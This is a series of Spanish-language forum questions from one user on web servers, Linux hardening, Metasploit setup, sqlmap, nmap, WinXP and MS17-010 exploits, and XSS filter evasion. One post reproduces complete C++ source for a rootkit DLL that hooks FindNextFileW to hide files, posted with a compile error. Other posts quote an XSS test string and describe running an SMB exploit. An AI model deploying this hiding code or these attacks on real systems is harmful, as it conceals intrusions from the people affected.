Buenas! Estaba leyendo un poco algunas comparativas entre ambos webservers. Según entendí Apache utiliza un thread por cada conexión que se establece, característica que puede llegar a reducir el rendimiento. NGINX procesa todas las request en el mismo proceso sin dividir por threads. Entonces si es por el tema del rendimiento yo creo que me quedaría con NGINX, además los sitios más grandes utilizan éste web server (Facebook WordPress, tumblr, Instagram, Yahoo, YouTube, Pinterest, Zynga, SourceForge, GitHub, DropBox, Intel, NetFlix), y muchos CDN (Cloudflare, NetDNA/MaxCDN, Cachefly, ProCDN/MediaTemple)

En cuanto la seguridad, estuve buscando las vulnerabilidades de ambos web server en cve-mitre. Noté que NGINX tiene 13 vulnerabilidades en total, mientras que Apache 823.

http://www.cvedetails.com/vendor/10048/Nginx.html
https://www.cvedetails.com/vulnerability-list/vendor_id-45/Apache.html

lo cuál me lleva a creer o que NGINX es mucho más seguro, o que los hackers se enfocan más en atacar a servidores Apache.

Entonces si lo que planteo es correcto, NGINX es más rápido y seguro, por lo que es una opción mejor a Apache. Me gustaría que me corrigieran ya que puede haber sacado mal las conclusiones, y que me dijeran con qué opción se quedarían ustedes y los motivos. Saludos y gracias!
#33
Muy buenas! Estaba aprendiendo algunas cosas sobre hardening en linux y me gustaría saber para ustedes cuál es el mejor linux teniendo la seguridad como criterio principal, para utilizar como servidor (por ejemplo un servidor web). Se que lo más importante son las herramientas, reglas, políticas y configuraciones que cada uno haga, pero seguramente puedan recomendar alguna distro por X motivo... Por ejemplo esta mañana descargué Fedora y noté que ya viene con SELinux habilitado por defecto. Me gustaría tener un sistema Linux, cómodo, seguro, que tenga snort o algún buen NIDS, que tenga SELinux, iptables/netfilter.
#34
Muy buenas! Estaba investigando sobre DLL injection y quería compilar una DLL en la que se hace api hooking a la system call que lista archivos. Estoy trabajando en Windows 7 x64 con CodeBlocks y el compilador mingw que viene incluido con el IDE. La DLL que quiero compilar la obtuve de éste sitio:

https://losindestructibles.wordpress.com/2012/10/15/creacion-de-rootkit-desde-cero/

Es la siguiente:

Código (c++) [Seleccionar]
#include "StdAfx.h"
#include <windows.h>
#include <iostream>
#include <cstdlib>


// DECLARACIONES:
BYTE *BufferFN;                 // Buffer que usaremos para ejecutar el api original FindNextFileW
char Prefijo[] = "S7K";   // El prefijo que buscaremos para ocultar archivos/carpetas


// FUNCIONES:
void    Hookear();  // Función que hookeará el api


// Función que será llamada en vez de FindNextFileW
HANDLE  __stdcall miFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATAW lpFindFileData);
// Puntero a función con el cual llamaremos al api FindNextFileW original
HANDLE (__stdcall *pBuffFN) (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);





// FUNCIÓN MAIN
bool WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
// Si cargan la DLL hookeamos
if (fdwReason == DLL_PROCESS_ATTACH)
{
Hookear();
}
return TRUE;
}



// FUNCIÓN QUE LLAMARÁ EL PROGRAMA PRINCIPLA CREYENDO QUE ES EL API FINDNEXTFILEW
HANDLE  __stdcall miFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATAW lpFindFileData)
{
// Ocultamos los archivos que empiecen por el prefijo indicado

HANDLE hand;
char ascStr[611];

do
{
hand = pBuffFN(hFindFile,lpFindFileData);
WideCharToMultiByte(CP_ACP, 0, lpFindFileData->cFileName, -1, ascStr, 611, NULL, NULL);

}while (strncmp(ascStr,Prefijo,strlen(Prefijo)) == 0 && hand != NULL);

return hand;
}


// FUNCIÓN PARA HOOKEAR FINDNEXTFILEW Y FINDFIRSTFILEW
void Hookear()
{
DWORD ProteVieja;  // Parametro para VirtualProtect
BYTE  *DirFN;      // La dirección en memoria de FindNextFileW
BYTE  *DirYoFN;    // La dirección en memoria de la función que remplaza a FindNextFileW

// --> HOOKEAMOS FINDNEXTFILEW (7 bytes)

// Obtenemos la dirección en memoria de FindNextFileW.
DirFN=(BYTE *) GetProcAddress(GetModuleHandle("kernel32.dll"), "FindNextFileW");

//Reservamos 12 bytes de memoria para nuestro Buffer
//FindNextFileW ocupa 7 bytes en la memoria, y necesitamos 5 más para poner nuestro salto alli estan los 12 bytes :D
BufferFN=(BYTE *) malloc (12);

//Le damos todos los permisos a los 12 bytes de nuestro Buffer
VirtualProtect((void *) BufferFN, 12, PAGE_EXECUTE_READWRITE, &ProteVieja);

// Copiamos los 7 primeros bytes del api en el buffer
memcpy(BufferFN,DirFN,7);
BufferFN += 7;

// En los 5 bytes restantes...
// En el primero introducimos un jmp
*BufferFN=0xE9; //0xE9 es el codigo de operacion del jmp
BufferFN++;

// En los otros 4 la distancia del salto
*((signed int *) BufferFN)= DirFN - BufferFN + 3;

// Asignamos al puntero, la funcion pBuff del inicio del Buffer para poder ejecutar el api original
pBuffFN = (HANDLE (__stdcall *)(HANDLE,LPWIN32_FIND_DATAW)) (BufferFN-8);

// Le damos todos los permisos a los 5 primeros bytes de la api original
VirtualProtect((void *) DirFN,5,PAGE_EXECUTE_READWRITE,&ProteVieja);

// Cambiamos el tipo a puntero a byte para facilitar el trabajo
DirYoFN=(BYTE *) miFindNextFileW;

// En el inicio de la api metemos un jmp para que salte a miFindNextFileW
*DirFN=0xE9;
DirFN++;

// Metemos la distancia del salto
*((signed int *) DirFN)=DirYoFN - DirFN - 4;
// Libermos librerias de cache
       FlushInstructionCache(GetCurrentProcess(),NULL,NULL);
}


Cuando quiero compilarla, el compilador devuelve el error:

undefined reference to `WinMain@16'

Build log:
CitarD:\BACK UP\Agus\zVarios\Jack\Code fuente rootkit\DLL\DLL.cpp: In function 'void Hookear()':
D:\BACK UP\Agus\zVarios\Jack\Code fuente rootkit\DLL\DLL.cpp:104:56: warning: passing NULL to non-pointer argument 3 of 'BOOL FlushInstructionCache(HANDLE, PCVOID, DWORD)' [-Wconversion-null]
mingw32-g++.exe  -o "D:\BACK UP\Agus\zVarios\Jack\Code fuente rootkit\DLL\DLL.exe" "D:\BACK UP\Agus\zVarios\Jack\Code fuente rootkit\DLL\DLL.o"  
c:/program files (x86)/codeblocks/mingw/bin/../lib/gcc/mingw32/4.7.1/../../../libmingw32.a(main.o):main.c:(.text.startup+0xa7): undefined reference to `WinMain@16'
collect2.exe: error: ld returned 1 exit status
Process terminated with status 1 (0 minute(s), 0 second(s))
1 error(s), 1 warning(s) (0 minute(s), 0 second(s))

Imagen:


Quiero entender que estoy haciendo mal, ya que al googlear el error hay mucha gente a la que el compilador les devuelve el mismo error que el mio, pero porque tenían otros errores en su código como por ejemplo usar Main() con mayúscula, u otros, pero no se qué hacer en éste caso en particular... Espero poder compilar ésto asi luego mejoro la DLL para hacer api hooking a system calls que listen procesos y conexiones de red... Muchas gracias por su tiempo!
#35
Que tal! Resulta que quería instalar metasploit en mi Debian 4.

Código (bash) [Seleccionar]
cat /etc/issue
Debian GNU/Linux 4.0 \n \l

uname -r
2.6.18-6-486


Estaba siguiendo los pasos de éste enlace: https://fity666.wordpress.com/about/
que decía:

CitarLo primero sera instalar las dependencias de ruby las cuales son esenciales para su instalación

sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems *

apt-get install libgtk2-ruby libglade2-ruby

El paso siguiente es descargar metasploit desde su sitio oficial

http://www.metasploit.com/framework/download/

Cuanto empiezo por el primer comando:

Citarapt-get install ruby libruby rdoc

Obtengo ésta salida:

Citarapt-get install ruby libruby rdoc
Reading package lists...
Building dependency tree...
Reading state information...
ruby is already the newest version.
libruby is already the newest version.
rdoc is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
2 not fully installed or removed.
After this operation, 0B of additional disk space will be used.
Setting up cupsys-client (1.2.7-4+etch9) ...
Adding group `lpadmin' (GID 110) ...
groupadd: unable to lock group file
addgroup: `/usr/sbin/groupadd -g 110 lpadmin' returned error code 10. Exiting.
dpkg: error processing cupsys-client (--configure):
subprocess post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of cupsys-bsd:
cupsys-bsd depends on cupsys-client (= 1.2.7-4+etch9); however:
  Package cupsys-client is not configured yet.
dpkg: error processing cupsys-bsd (--configure):
dependency problems - leaving unconfigured
Errors were encountered while processing:
cupsys-client
cupsys-bsd
E: Sub-process /usr/bin/dpkg returned an error code (1)

Como ven, los paquetes de ruby que necesito para instalar metasploit no se pudieron instalar como corresponde. Tengo muchos problemas con el apt-get. Mi sources.list contiene lo siguiente:

Citardeb http://ftp.de.debian.org/debian-archive/debian/ etch main
deb-src http://ftp.de.debian.org/debian-archive/debian/ etch main

Ya hice un apt-get update, y luego probé también apt-get upgrade y aquí obtengo problemas parecidos al que compartí aquí arriba...

Me gustaría que me dieran alguna idea para resolver mi problema. Si necesitan algo más de información, avisenme. Saludos y gracias!

#36
Que tal, tenía un problema pero ya lo resolví y quería eliminar la pregunta pero no encuentro la forma de hacerlo. Gracias
#37
Miren como funciona éste buscador:

http://www.ejemplo.com//SEARCHED/ST=mi_busqueda/gbpws.aspx

Fijense donde resalté mi_busqueda, aquí está el valor del parametro que utiliza el buscador de éste sitio web de ejemplo. Hay varias cosas que no enteindo en ésta url, entre ello no entiendo por que hay dos barras '//' entre el .com y el SEARCHED. SEARCHED lo interpreto como un directorio dentro de la web, pero entre las dos '//', se me viene algo a la mente como un directorio fantasma, sin nombre, pero no entiendo como puede ser posible. Después, no entiendo que sería 'ST', lo lógico sería que fuera el nombre del parámetro, pero no entiendo por que está antes del archivo .aspx que sería el archivo de la página en si. Lo normal, y lo que veo dia a dia en todas las webs es que los parámetros estén después del nombre de la página seguido a un signo de interrogación '?'

Por ejemplo, yo estoy acostumbrado a que la página sea de éste modo:

http://www.ejemplo.com/SEARCHED/gbpws.aspx?ST=mi_busqueda

Me gustaría que me ayudaran a entender la naturaleza de este enlace y también saber como se podría inyectar a través de sqlmap a un parámetro como éste, ya que la opción -p ST no funciona en éste caso.

Saludos y gracias!
#38
Qué tal! Ésta es una duda que tengo desde hace mucho. Se que la potencia es adherente al adaptador y la ganancia a la antena... Pero quiero saber que es exactamente lo que cambiaría al tener un adaptador con más potencia y/o una antena con más ganancia. Cuanto mayor es el número de ambas medidas, mayor sería la distancia máxima de las señales que puedo escuchar?

Y si por ejemplo tengo:
Un adaptador de 500mW y una antena de 18dBi
o
Un adaptador de 1000mW y una antena de 5dBi

estaría teniendo algo equivalente?

P.D: ya se que existen antenas direccionales y omnidireccionales, y que las direccionales intensifican la señal en una dirección especifica, y las omnidireccionales la distribuyen equitativamente en todas las direcciones.

Gracias por ayudarme a aclarar las dudas. Saludos!
#39
Redes / Capturar trama ethernet completa
25 Mayo 2017, 10:05 AM
Que tal, estuve capturando los paquetes que entran y salen de mi pc, y noté que en la sección de la trama ethernet solo figuran la MAC destino, origen y el ethertype, pero nunca veo el preámbulo, ni el CRC que según leí también forman parte de una trama ethernet. Quería saber por qué no me llegan dichos campos. Saludos
#40
Muy buenas! Como muchos sabran estos días se dieron a conocer vulnerabilidades gravisimas que afectaron a Telefónica y otras empresas y técnicas de la CIA, todas afectando a la mayoría de sistemas Windows. Estuve leyendo un poco sobre el ransomware Wanna Cry, y descubrí que usa como base ésta nueva vulnerabilidad en el protocolo SMB que corre en el puerto 445 de Windows y que es accesible desde adentro de una LAN. En base a éste fallo, se creo el malware que se propaga y cifra todo lo que esté a su paso. La forma para no ser vulnerable es a través de la actualización de windows MS17-010. Bueno, queriendo experimentar un poco con ésto, encontré éste exploit en exploit-db.com:

https://www.exploit-db.com/exploits/41987/

Abrí una máquina virtual con Kali, descargue el exploit, lo llame ms17010.py, le di permisos de ejecución, y lo ejecute de la siguiente forma :

python3 ms17010.py ipaddress

en ipaddress utilice la ip privada de mi mi Windows 7 (el SO que tengo instalado en disco y no corro virtualizado). Luego de ejecutarlo esperaba encontrarme con varios errores en el interprete de python que debería depurar, como suele pasar frecuentemente con los exploits de exploit-db.com, pero no, mucho peor... Windows me tiró Kernel Panic (BlueScreen), me gustaría saber si ustedes lo probaron y les paso lo mismo que a mi, o si encontraron algo que modificar y lo modificaron para dejarlo funcionando.

Saludos y muchas gracias desde ya!
#41
Muy buenas a todos! Lo que necesito hacer es saber si una cadena está contenida en el final de otra, la segunda puede tener caracteres indefinidos. Por ejemplo, quiero saber si la palabra:

'tacoman33'

está incluida en el final de:

'SL.D....t..om..33'

Siendo '.' un caracter indefinido, o 'comodín'.

supongamos que 'tacoman33' es el valor de una variable cadena1 y 'SL.D....t..om..33' el valor de una variable cadena2.

En ésta caso, tacoman33 sí puede llegar a ser el final de dicha cadena, entonces, en éste caso, se imprimiria el valor de cadena1.

Si la cadena2 fuera:

'SL.D....t..om..33....'

en éste caso, debería ser falso y no imprimir nada, ya que cadena2 no podría terminar nunca en tacoman33 ya que hay 4 caracteres más luego del 33.

Espero que me hayan entendido. Saludos!
#42
Seguridad / Nuevos ataques a WinXP?
8 Diciembre 2016, 21:06 PM
Muy buenas a todos! Como todos sabemos, está la famosisima vulnerabilidad MS67_netapi que explotaba un overflow en el servicio SMB, pero ésta vulnerabilidad ya es vieja y existe un parche para la misma... Como leí, el soporte para WinXP finalizó en 2014. Lo que me llego a imaginar es que como no hay soporte, si se llega a descubrir algun fallo nuevo, cualquiera podría aprovecharlo con cualquier XP y jamás sería parchado, sería como una puerta abierta que nunca se va a cerrar. Estuve buscando nuevas vulnerabilidades remotas y no encontré. Ustedes saben algo sobre posibles nuevos ataques a WinXP, ataques luego de que el período de soporte finalizó?
#43
Qué tal!? Resulta que tengo mi pc particionada con linux por un lado y windows por el otro. Yo suelo usar Linux y mi viejo Windows. Mi viejo hace click y descarga cualquier cosa sin revisar lo que está bajando... Ya se lo advertí pero parece no entender, y asi se llena la máquina de virus que secuestran el navegador, agregan publicidades molestas, etc... Quería saber si de alguna forma, algún troyano que se ejecute sobre Windows puede llegar a leer/manipular archivos guardados en mi partición de Linux. Por lo que yo se, Windows suele usar un filesystem NTFS, y Linux ext4... Desde Linux puedo acceder a la partición de Windows a través de un directorio en concreto, pero desde Windows no puedo ver lo que hay en Linux... Quería saber si existe alguna forma para que leer/manipular archivos de Linux desde Windows sea posible, y si es una técnica común empleada en troyanos o es poco factible. Si tienen algúna lectura interesante para recomendar, agradecería mucho que me brinden el link. Gracias y saludos!
#44
Que tal, muy buenas a todos. Estaba haciendo un escaneo con nmap a mi ip pública... Mi red simplemente se conforma por el router, unas pcs desktop, una notebook y un celular. Las computadoras tienen diferentes SO, probé dejar en cada computadora un servicio distinto y a través del port forwarding del router hacer que los servicios corriendo en las distintas máquinas sean accesibles via internet... Cuando hago el escaneo a mi ip pública se ven todos los servicios que tengo corriendo, independientemente sobre que pc se estén ejecutando... Entonces mi pregunta sería, la detección del SO (opcion -O) información sobre el SO de qué máquina se supone que me vaya a dar? En el caso de una red empresarial que seguramente sea mucho más extensa y compleja, qué se supondría que informara? O si se usa algún dispositivo cisco con SO incorporado, pero ese dispositivo conecta a varias máquinas con distintos SO dentro de la red, como sería en este caso? Me gustaría que me ayudaran a entender, y si tienen algún libro, o articulos interesantes sobre estructuras de red comunes en empresas, firewalls, y dispositivos de red también me interesaría informarme sobre eso... Hace poco en mi universidad hicieron una exposición sobre firewalls y estructuras comunes en redes, a la cuál se me complico para asistir... Si tienen algún libro referente al tema, estaría muy agradecido. Saludos y gracias!
#45
Que tal, ésto es una duda que tengo desde hace bastante...

Estaba probando si una página web era vulnerable a XSS, ingreso en el buscador la clásica cadena

<script>alert('XSS')</script>

y me devuelve el resultado:

No se ha encontrado ningun resultado para "<script>alert('XSS')</script>"

Cómo muchos saben, en éste enlace de OWASP podemos encontrar muchísimas formas para bypassear filtros:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Mi duda es cómo saber cuál de todos probar, porque son muchísimos, o si la única alternativa es probandolos a todos por fuerza bruta, haciendo un script que automatice la tarea, o algo de éste estilo...

Alguien alguna vez me dijo que para saber qué filtro usa determinada web, me tendría que basar en la respuesta que recibo despues de enviar el ataque... Con la respuesta que recibí:


No se ha encontrado ningun resultado para "<script>alert('XSS')</script>"

que información me estaría brindando acerca de los filtros que puede llegar a usar?

Saludos y gracias